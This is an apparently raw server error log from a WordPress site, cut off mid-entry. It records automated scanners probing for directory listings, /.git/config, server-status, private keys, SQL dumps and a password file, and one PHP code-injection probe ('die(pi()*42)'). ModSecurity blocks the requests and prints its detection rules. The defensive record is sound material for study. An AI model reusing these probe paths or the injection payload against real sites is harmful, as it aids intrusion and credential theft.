(index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:30:44.745640 2024] [autoindex:error] [pid 2165:tid 140339935377152] [client 193.34.213.138:43940] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/dist/reusable-blocks/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:30:57.039644 2024] [autoindex:error] [pid 2165:tid 140340181366528] [client 193.34.213.138:43954] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/dist/widgets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:31:01.244088 2024] [autoindex:error] [pid 2007:tid 140340010911488] [client 193.34.213.138:43962] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/customize/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:31:16.227102 2024] [autoindex:error] [pid 2007:tid 140339968947968] [client 193.34.213.138:43968] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/fonts/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:31:28.368975 2024] [autoindex:error] [pid 2006:tid 140340027696896] [client 193.34.213.138:43972] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:31:32.953222 2024] [autoindex:error] [pid 2007:tid 140340019304192] [client 193.34.213.138:43976] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/crystal/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:31:34.354791 2024] [autoindex:error] [pid 2008:tid 140340198151936] [client 193.34.213.138:43980] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/media/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:31:35.914388 2024] [autoindex:error] [pid 2165:tid 140339952162560] [client 193.34.213.138:43988] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/smilies/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:31:47.137761 2024] [autoindex:error] [pid 2165:tid 140339977340672] [client 193.34.213.138:43994] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/wlw/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:31:54.890699 2024] [autoindex:error] [pid 2008:tid 140340044482304] [client 193.34.213.138:44002] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:31:59.076391 2024] [autoindex:error] [pid 2006:tid 140340036089600] [client 193.34.213.138:44006] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/codemirror/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:32:06.483746 2024] [autoindex:error] [pid 2006:tid 140340002518784] [client 193.34.213.138:44012] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/crop/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:32:11.683309 2024] [autoindex:error] [pid 2008:tid 140340172973824] [client 193.34.213.138:44016] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/dist/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:32:18.809976 2024] [autoindex:error] [pid 2165:tid 140340147795712] [client 193.34.213.138:44022] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/dist/vendor/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:32:33.972455 2024] [autoindex:error] [pid 2007:tid 140340069660416] [client 193.34.213.138:44026] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/imgareaselect/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:32:36.631519 2024] [autoindex:error] [pid 2008:tid 140340019304192] [client 193.34.213.138:44030] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/jcrop/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:32:49.512948 2024] [autoindex:error] [pid 2006:tid 140339968947968] [client 193.34.213.138:44038] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/jquery/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:32:58.366280 2024] [autoindex:error] [pid 2165:tid 140339985733376] [client 193.34.213.138:44048] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/jquery/ui/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:33:03.972831 2024] [autoindex:error] [pid 2165:tid 140339952162560] [client 193.34.213.138:44054] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/mediaelement/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:33:09.379718 2024] [autoindex:error] [pid 2007:tid 140340164581120] [client 193.34.213.138:44058] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/mediaelement/renderers/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:33:20.138399 2024] [autoindex:error] [pid 2007:tid 140340147795712] [client 193.34.213.138:44066] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/plupload/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:33:33.113448 2024] [autoindex:error] [pid 2165:tid 140339943769856] [client 193.34.213.138:44072] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/swfupload/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:33:39.383675 2024] [autoindex:error] [pid 2006:tid 140340198151936] [client 193.34.213.138:44080] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/thickbox/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:33:44.073777 2024] [autoindex:error] [pid 2007:tid 140340010911488] [client 193.34.213.138:44086] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:33:51.500543 2024] [autoindex:error] [pid 2008:tid 140339968947968] [client 193.34.213.138:44090] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/langs/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:34:00.345367 2024] [autoindex:error] [pid 2008:tid 140339926984448] [client 193.34.213.138:44098] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/plugins/charmap/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:34:18.182660 2024] [autoindex:error] [pid 2165:tid 140340198151936] [client 193.34.213.138:44116] AH01276: Cannot serve directory /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/footer/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:34:31.626587 2024] [autoindex:error] [pid 2006:tid 140340019304192] [client 193.34.213.138:44132] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/rest-api/search/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:34:43.272086 2024] [autoindex:error] [pid 2008:tid 140340069660416] [client 193.34.213.138:44142] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/plugins/image/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:34:49.782710 2024] [autoindex:error] [pid 2008:tid 140340181366528] [client 193.34.213.138:44146] AH01276: Cannot serve directory /home/investig/public_html/wp-content/themes/twentytwentytwo/inc/patterns/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 13:45:18.269903 2024] [:error] [pid 2165:tid 140339935377152] [client 184.170.245.148:48208] [client 184.170.245.148] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:css. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:css: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/geju.php"] [unique_id "ZvG3PsPO0mpPvZz7qEis_QAAANc"] [Tue Sep 24 02:36:20.478220 2024] [authz_core:error] [pid 2165:tid 140340019304192] [client 159.65.18.197:57260] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/09/24 02:36:24 [error] 1981#1981: *29134 access forbidden by rule, client: 159.65.18.197, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Tue Sep 24 08:29:06.136217 2024] [authz_core:error] [pid 25624:tid 140073588688640] [client 138.68.86.32:34714] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/09/24 08:29:10 [error] 25166#25166: *32720 access forbidden by rule, client: 138.68.86.32, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Tue Sep 24 11:43:49.033597 2024] [autoindex:error] [pid 25624:tid 140073697793792] [client 182.73.93.216:38662] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/certificates/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Sep 24 11:44:51.207742 2024] [autoindex:error] [pid 25624:tid 140073689401088] [client 182.73.93.216:38682] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/widgets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Sep 24 11:45:02.537675 2024] [autoindex:error] [pid 25624:tid 140073605474048] [client 14.97.209.247:38692] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive 2024/09/25 13:48:41 [error] 9707#9707: *57953 access forbidden by rule, client: 179.43.152.66, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Wed Sep 25 18:13:01.925269 2024] [autoindex:error] [pid 9715:tid 140555212220160] [client 4.240.32.104:57432] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Thu Sep 26 03:43:00.316868 2024] [authz_core:error] [pid 12442:tid 140292975990528] [client 68.183.180.73:40864] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/09/26 03:43:07 [error] 11737#11737: *72780 access forbidden by rule, client: 68.183.180.73, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Thu Sep 26 14:10:16.408984 2024] [authz_core:error] [pid 2471:tid 140292925634304] [client 206.81.24.74:47938] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/09/26 14:10:21 [error] 2057#2057: *76327 access forbidden by rule, client: 206.81.24.74, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/09/26 16:09:27 [error] 2056#2056: *77408 access forbidden by rule, client: 107.178.78.2, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Thu Sep 26 16:59:48.937650 2024] [autoindex:error] [pid 2110:tid 140293158680320] [client 195.3.223.108:50210] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Sep 26 17:59:37.562386 2024] [autoindex:error] [pid 2471:tid 140292883670784] [client 195.3.223.108:50888] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive 2024/09/27 00:45:52 [error] 2057#2057: *80744 access forbidden by rule, client: 96.126.110.181, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/09/27 00:45:54 [error] 2057#2057: *80814 access forbidden by rule, client: 206.81.24.227, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/09/27 00:45:57 [error] 2057#2057: *80935 access forbidden by rule, client: 138.68.144.227, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/09/27 00:45:57 [error] 2057#2057: *80952 access forbidden by rule, client: 178.128.207.138, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/09/27 00:45:58 [error] 2056#2056: *81008 access forbidden by rule, client: 188.166.108.93, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" [Fri Sep 27 00:46:05.379236 2024] [authz_core:error] [pid 2471:tid 140293108324096] [client 138.68.144.227:56130] AH01630: client denied by server configuration: /home/investig/public_html/server-status [Fri Sep 27 00:46:05.788226 2024] [authz_core:error] [pid 2112:tid 140293150287616] [client 164.92.244.132:56134] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/09/27 00:46:11 [error] 2056#2056: *81161 access forbidden by rule, client: 138.68.144.227, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/09/27 00:46:12 [error] 2056#2056: *81165 access forbidden by rule, client: 164.92.244.132, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/09/27 01:11:52 [error] 2056#2056: *81482 access forbidden by rule, client: 46.19.137.50, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/09/27 08:39:38 [error] 7605#7605: *86840 access forbidden by rule, client: 213.232.87.230, server: mail.investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "mail.investigacionperu.com" 2024/09/27 08:39:38 [error] 7604#7604: *86846 access forbidden by rule, client: 109.202.99.36, server: mail.investigacionperu.com, request: "GET /.svn/wc.db HTTP/1.1", host: "mail.investigacionperu.com" [Fri Sep 27 08:39:40.183122 2024] [:error] [pid 7746:tid 140640641869568] [client 213.232.87.228:39860] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/server.key"] [unique_id "Zva1nKhNYU8L5pHE_yrU9QAAAIY"] [Fri Sep 27 08:39:40.196233 2024] [:error] [pid 7745:tid 140640733677312] [client 213.232.87.228:39868] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/dump.sql"] [unique_id "Zva1nHS9QK3Qt3_keJRNsAAAAEQ"] [Fri Sep 27 08:39:40.209629 2024] [:error] [pid 7744:tid 140640758855424] [client 213.232.87.228:39880] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/backup.sql"] [unique_id "Zva1nH1BtUmDRqWU6L1dUgAAAAE"] [Fri Sep 27 08:39:40.224096 2024] [:error] [pid 8300:tid 140640541157120] [client 213.232.87.228:39896] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".pwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/_vti_pvt/administrators.pwd"] [unique_id "Zva1nOCyRkyzYVtCjuJ6wAAAANI"] [Fri Sep 27 08:39:40.228448 2024] [:error] [pid 7745:tid 140640616691456] [client 213.232.87.228:39870] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ 